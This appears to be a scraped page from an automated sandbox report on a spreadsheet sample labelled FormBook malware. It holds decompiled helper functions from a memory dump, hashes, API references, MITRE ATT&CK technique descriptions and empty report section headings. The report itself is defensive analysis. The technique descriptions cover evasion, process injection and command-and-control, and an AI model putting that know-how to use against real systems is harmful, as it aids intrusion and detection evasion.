0x4a740a23
0x4a740a2f
0x4a740a43
0x4a740a4d
0x4a740a54
0x4a740a5b
0x4a740a5c
0x4a740a5e
0x4a740a64
0x4a740a6b
0x4a740a6d
0x4a740a73
0x4a740a92
0x4a740a92
0x4a740a96
0x4a740a97
0x4a740a97
0x4a740a9c
0x4a740a9c
0x4a740aa0
0x4a740aa2
0x4a740aa8
0x4a740aab
0x4a740aab
0x4a740aaf
0x4a740ab0
0x4a740ab0
0x4a740abb
0x4a740abd
0x4a74b75c
0x4a74b761
0x4a740ac3
0x4a740ad0
0x4a740ae4
0x4a740ae4
0x4a740abd
0x4a740a6b
0x4a740ae9
0x00000000
0x4a740ae9
0x4a73916c
0x4a73916c
0x4a739172
0x4a739181
0x4a739193
0x4a739198
0x4a73919a
0x4a7391a5
0x4a7391a5
0x4a7391b0
0x00000000
0x4a7391b0
0x4a739166
0x4a73935c
0x4a739364
0x4a739365
0x4a739366
0x4a73936a
0x4a739372
0x4a7368f9
0x4a7368fa
0x4a736905
0x4a736905
0x4a7368a1
0x4a7368a1
0x4a7368a1
0x4a7368a7
0x00000000
0x00000000
0x4a7368b0
0x4a7368b1
0x00000000
0x00000000
0x00000000
0x4a7368b1
0x00000000
0x4a7368a1
0x4a73689f
0x4a73688d
0x4a736878

APIs

_wcsnicmp.MSVCRT ref: 4A736882
swscanf.MSVCRT ref: 4A7368C1

Strings

:EOF, xrefs: 4A736898

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsnicmpswscanf
String ID: :EOF
API String ID: 1534968528-551370653
Opcode ID: b6879a8d5ff019c8d9dd6f1c3bd1a631b9915b8215cea018774e28bfa34debaf
Instruction ID: d7e22936c1308214fb2ed01a8a8c084a1c9bd1eeb1e59dc5138186aee96442cc
Opcode Fuzzy Hash: b6879a8d5ff019c8d9dd6f1c3bd1a631b9915b8215cea018774e28bfa34debaf
Instruction Fuzzy Hash: 9F212675949A20ABEBB09B00C9447EB3F78EF05751F134015EC41A7903C7B8CE59D796

Uniqueness

Uniqueness Score: -1.00%

Function 4A739A54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wcsnicmp.MSVCRT ref: 4A739A84

Strings

/-Y, xrefs: 4A740DC9

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _wcsnicmp
String ID: /-Y
API String ID: 1886669725-4274875248
Opcode ID: 3553890fc15ac658f4d57ddcc5168b807ffef9d8b989c3f5954676d9bbbb7f60
Instruction ID: b47fd822746465cf91f502a3498a733b0c80af2bac7111e5be99f7045d8f4063
Opcode Fuzzy Hash: 3553890fc15ac658f4d57ddcc5168b807ffef9d8b989c3f5954676d9bbbb7f60
Instruction Fuzzy Hash: 02115B3951DA20B7D7708A0984503F77FB4AF41255B134291ECC19B443D3259E1ED3A0

Uniqueness

Uniqueness Score: -1.00%

Function 4A74F1B6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E4A74F1B6(void* __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a52) {
				signed int _v8;
				void* _t17;
				void* _t26;
				signed int _t29;

				_t29 = __edx;
				_t28 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if((_a4 | _a8) == 0) {
					_v8 = _v8 & 0x00000000;
					_t26 = 0x64;
				} else {
					_t26 = E4A743E2D(E4A743ED7(_a12, _a16, 0x64, 0), _t29, _a4, _a8);
					_v8 = _t29;
				}
				E4A7399E1(_t28, 0x40002722, 1, E4A739A2C(0x4a74f250, _t26));
				if( *0x4a7541b4 == 0) {
					_t17 = 0;
				} else {
					E4A7399E1(_t28, 0x40002722, 1, E4A739A2C(0x4a74f250, _t26));
					printf(0x4a74f24c);
					_t17 = (0 | _a52 != 0x00000000) + 1;
				}
				return _t17;
			}

0x4a74f1b6
0x4a74f1b6
0x4a74f1bb
0x4a74f1bc
0x4a74f1c6
0x4a74f1eb
0x4a74f1f1
0x4a74f1c8
0x4a74f1e4
0x4a74f1e6
0x4a74f1e6
0x4a74f207
0x4a74f216
0x4a74f241
0x4a74f218
0x4a74f223
0x4a74f22d
0x4a74f23e
0x4a74f23e
0x4a74f247

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 4A74F1DF
printf.MSVCRT ref: 4A74F22D

Strings

%3d, xrefs: 4A74F1F3, 4A74F1F8, 4A74F219

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@printf
String ID: %3d
API String ID: 2845598586-2138283368
Opcode ID: b0b5767a206c266adf48fbdcdcc0ef20af0b5cc6e6a578a2124a82c50b7ce556
Instruction ID: 102e22fb172cfaa95b1ae5a86197af61fbd6f14c28b74254652226c63c068e15
Opcode Fuzzy Hash: b0b5767a206c266adf48fbdcdcc0ef20af0b5cc6e6a578a2124a82c50b7ce556
Instruction Fuzzy Hash: 9501F571558109BBEB319B60CC46FEF3AADDB84B60F118014F704A90C2D2B6AE58C375

Uniqueness

Uniqueness Score: -1.00%

Function 4A73694B, Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A73694B(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				int _t13;
				signed short _t15;
				intOrPtr _t31;
				void* _t32;
				void* _t37;
				void* _t43;

				_t31 = _a4;
				if(_t31 == 0) {
					L7:
					return _t11;
				}
				_t2 = _t31 + 0x14; // 0x0
				_t11 =  *_t2;
				if(_t11 == 0) {
					goto L7;
				}
				_t12 = _t11 - 1;
				 *(_t31 + 0x14) = _t12;
				_t5 = _t12 * 4; // 0x4a7542a0
				_t13 = _t31 + _t5 + 0x90;
				_t37 =  *_t13;
				 *_t13 =  *_t13 & 0x00000000;
				if(_t37 != 0) {
					_t15 =  *( *_t37) & 0x0000ffff;
					if(_t15 >= 0x61) {
						if(_t15 <= 0x7a) {
							_t15 = _t15 + 0xffffffe0;
						}
					}
					_t43 =  *0x4a755260 - (_t15 & 0x0000ffff); // 0x0
					if(_t43 != 0) {
						E4A7400DD(_t32, (_t16 & 0x0000ffff) - 0x40);
					}
					E4A737267( *_t37);
					HeapFree(GetProcessHeap(), 0,  *_t37);
					E4A736913( *((intOrPtr*)(_t37 + 4)));
					E4A7369E8( *((intOrPtr*)(_t37 + 4)));
					 *0x4a754081 =  *((intOrPtr*)(_t37 + 8));
					 *0x4a754082 =  *((intOrPtr*)(_t37 + 9));
					_t13 = HeapFree(GetProcessHeap(), 0, _t37);
				}
				return _t13;
			}

0x4a736950
0x4a736955
0x4a7369e0
0x4a7369e0
0x4a7369e0
0x4a73695b
0x4a73695b
0x4a736960
0x00000000
0x00000000
0x4a736962
0x4a736963
0x4a736966
0x4a736966
0x4a73696e
0x4a736970
0x4a736975
0x4a736979
0x4a736980
0x4a744103
0x4a744109
0x4a744109
0x4a744103
0x4a736989
0x4a736990
0x4a740166
0x4a740166
0x4a73699a
0x4a7369b2
0x4a7369b7
0x4a7369bf
0x4a7369c7
0x4a7369d2
0x4a7369da
0x4a7369dd
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,0000233F,0000233F,4A76C642,00000000,0000233F,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723), ref: 4A7369A9
HeapFree.KERNEL32(00000000,?,4A73DA7E), ref: 4A7369B2
GetProcessHeap.KERNEL32(00000000,0000233F,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723,4A76C642,4A731BBC), ref: 4A7369D7
HeapFree.KERNEL32(00000000,?,4A73DA7E), ref: 4A7369DA

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 5b5e71e8434560815658446dc006cf3c2699fe1302d33f289b2f1da5d4dc4dba
Instruction ID: 13286512298704e4349b565a065e64e43781c6b464762600a83b4f89dcf5643a
Opcode Fuzzy Hash: 5b5e71e8434560815658446dc006cf3c2699fe1302d33f289b2f1da5d4dc4dba
Instruction Fuzzy Hash: 5A1101B2109654AAEB319FA8C885BA77FBCEF45311F02405EE286CB653C229E815D760

Uniqueness

Uniqueness Score: -1.00%

Function 4A73C039, Relevance: 5.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E4A73C039(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				intOrPtr* _t7;
				void* _t14;
				void* _t15;
				void* _t20;
				void* _t24;
				intOrPtr _t25;
				void* _t27;

				_push(_t20);
				_t7 = 0x4a755260;
				_t1 = _t7 + 2; // 0x4a755262
				_t24 = _t1;
				do {
					_t25 =  *_t7;
					_t7 = _t7 + 2;
				} while (_t25 != 0);
				_t2 = (_t7 - _t24 >> 1) + 1; // 0x4a755263
				_t27 = _t2;
				E4A732C56(_t20, _t25, _t27, 0x4a755260, 0x104, 0);
				_t14 = HeapAlloc(GetProcessHeap(), 0, _t27 + _t27);
				_v8 = _t14;
				if(_t14 == 0) {
					L6:
					_t15 = 0;
				} else {
					E4A73185A(_t14, _t27, 0x4a755260);
					if(E4A73C0AE(_v8) == 0) {
						HeapFree(GetProcessHeap(), 0, _v8);
						goto L6;
					} else {
						_t15 = 1;
					}
				}
				return _t15;
			}

0x4a73c03f
0x4a73c046
0x4a73c049
0x4a73c049
0x4a73c04c
0x4a73c04c
0x4a73c050
0x4a73c051
0x4a73c062
0x4a73c062
0x4a73c065
0x4a73c079
0x4a73c07f
0x4a73c084
0x4a73c0a5
0x4a73c0a5
0x4a73c086
0x4a73c089
0x4a73c098
0x4a7481dc
0x00000000
0x4a73c09e
0x4a73c09e
0x4a73c09e
0x4a73c098
0x4a73c0a4

APIs

GetProcessHeap.KERNEL32(00000000,00000000,4A755260,00000104,00000000), ref: 4A73C076
HeapAlloc.KERNEL32(00000000), ref: 4A73C079

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 2d0dba0f4674344be9b99daee626add65c18ef7bff7efb918ee2d40408ee7e4c
Instruction ID: e5f69aa307b3ecac89991b833be84c909ad605b733116490fce21ad3a9aa19b6
Opcode Fuzzy Hash: 2d0dba0f4674344be9b99daee626add65c18ef7bff7efb918ee2d40408ee7e4c
Instruction Fuzzy Hash: 0701D4B260864ABAEA205BA4CC4DFEB3F6CEF41791F060010E505DB142EA60DE18C774

Uniqueness

Uniqueness Score: -1.00%

Function 4A736FD6, Relevance: 5.0, APIs: 4, Instructions: 33
memoryCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E4A736FD6(void* __ecx) {
				long _t4;
				void* _t9;
				void* _t12;

				_t9 = __ecx;
				_t12 = HeapAlloc(GetProcessHeap(), 8, 4);
				if(_t12 == 0) {
					L4:
					return 0;
				}
				_t4 = E4A7316AD();
				 *_t12 = _t4;
				if(_t4 == 0) {
					HeapFree(GetProcessHeap(), _t4, _t12);
					_push(0);
					_push(0x233a);
					E4A736D44(_t9);
					goto L4;
				}
				return _t12;
			}

0x4a736fd6
0x4a736fed
0x4a736ff1
0x4a74524a
0x00000000
0x4a74524a
0x4a736ff7
0x4a736ffc
0x4a737000
0x4a745256
0x4a74525c
0x4a74525e
0x4a745263
0x00000000
0x4a745269
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000004,?,?,4A737B02,4A738533), ref: 4A736FE4
HeapAlloc.KERNEL32(00000000), ref: 4A736FE7

Part of subcall function 4A7316AD: GetEnvironmentStringsW.KERNEL32(?,?,4A737AF8,4A738533), ref: 4A7316B1
Part of subcall function 4A7316AD: GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A7316CB
Part of subcall function 4A7316AD: HeapAlloc.KERNEL32(00000000), ref: 4A7316D2
Part of subcall function 4A7316AD: memcpy.MSVCRT ref: 4A7316E1
Part of subcall function 4A7316AD: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A7316EA

GetProcessHeap.KERNEL32(00000000,00000000), ref: 4A745253
HeapFree.KERNEL32(00000000), ref: 4A745256

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocEnvironmentFreeStrings$memcpy
String ID:
API String ID: 197374240-0
Opcode ID: 824d7da1e545e438b7cebc4d82052fc4b3b879d294eb904d495091bcf67cc560
Instruction ID: f27f67275b328a15b311d6c2a1d1ec9da3848dd219045f75a2520f5be30082be
Opcode Fuzzy Hash: 824d7da1e545e438b7cebc4d82052fc4b3b879d294eb904d495091bcf67cc560
Instruction Fuzzy Hash: B9E06DF275961276DB3016BA9C0EB472F6D9BCA7B2F170016B608DA181DE20CC08C738

Uniqueness

Uniqueness Score: -1.00%

Function 4A7369E8, Relevance: 5.0, APIs: 4, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A7369E8(void* _a4) {
				void* _t6;

				_t6 = _a4;
				HeapFree(GetProcessHeap(), 0,  *_t6);
				return HeapFree(GetProcessHeap(), 0, _t6);
			}

0x4a7369ee
0x4a736a06
0x4a736a14

APIs

GetProcessHeap.KERNEL32(00000000,4A754210,74EC14B9,0000233F,74EC1499,?,4A7369C4,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000), ref: 4A7369FD
HeapFree.KERNEL32(00000000,?,4A7369C4), ref: 4A736A06
GetProcessHeap.KERNEL32(00000000,4A754210,?,4A7369C4,?,?,?,4A73DA7E,4A749563,00000000,00000000,00000000,00000000,?,4A74FCAB,4A743723), ref: 4A736A0B
HeapFree.KERNEL32(00000000,?,4A7369C4), ref: 4A736A0E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 6e8aa40710a31f02a2b989bb501b0f0fb893f1cac87a55aab93d6f4e3a97ac18
Instruction ID: 3570b3ad08c6f215c6fa73f16266496762c562cd1c0ba5c0aaed3b963c676e64
Opcode Fuzzy Hash: 6e8aa40710a31f02a2b989bb501b0f0fb893f1cac87a55aab93d6f4e3a97ac18
Instruction Fuzzy Hash: 6DD012B360525C77DA1066DA9C45F577F6CEBC97A2F064022F308C71408571AC10CBB5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report OCT 13 2021 - PRINT COPY.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Exploits:

System Summary:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Function 00418660, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Function 00409B30, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 004185AA, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 004185B0, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041878A, Relevance: 1.5, APIs: 1, Instructions: 34
memorynativeCOMMON

Function 004186DA, Relevance: 1.5, APIs: 1, Instructions: 32
nativeCOMMON

Function 00418790, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 004186E0, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON